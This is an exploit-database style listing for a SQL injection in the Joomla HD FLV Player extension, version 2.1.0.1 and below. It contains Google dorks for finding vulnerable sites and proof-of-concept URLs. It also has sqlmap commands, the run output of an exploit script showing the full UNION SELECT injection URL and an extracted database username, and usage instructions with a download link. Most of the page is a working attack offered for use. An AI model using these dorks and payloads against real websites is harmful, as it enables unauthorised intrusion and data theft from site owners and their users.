Info
# Exploit Title : Joomla HD FLV Player 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/-EdOQSjAhW8
#
# Poc:
# http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
# http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
#
# Poc sqlmap:
# sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
# sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
Exploit Preview
claudio@backbox3:~/claudio$ python j00m_hd_flv_sql_injection.py -t http://10.0.0.67/joomla
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \
|___| | _ | _ | | | _ | |. 1 |. | \
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'
<= 2.1.0.1 Sql Injection
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Searching HD FLV Extension...: FOUND
[+] Checking Version: 2.1.0.1
[+] Exploiting...please wait: ###################
[!] VULNERABLE
[*] Username: pippo@localhost
[*] 3v1l Url: http://10.0.0.67/joomla/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
claudio@backbox3:~/claudio$
Download
Download Exploit: HERE
Exploit Usage
claudio@backbox3:~$ python j00m_hd_flv_sql_injection.py -t http[s]://localhost[:PORT]
python j00m_hd_flv_sql_injection.py -t http[s]://localhost[:PORT]/basedir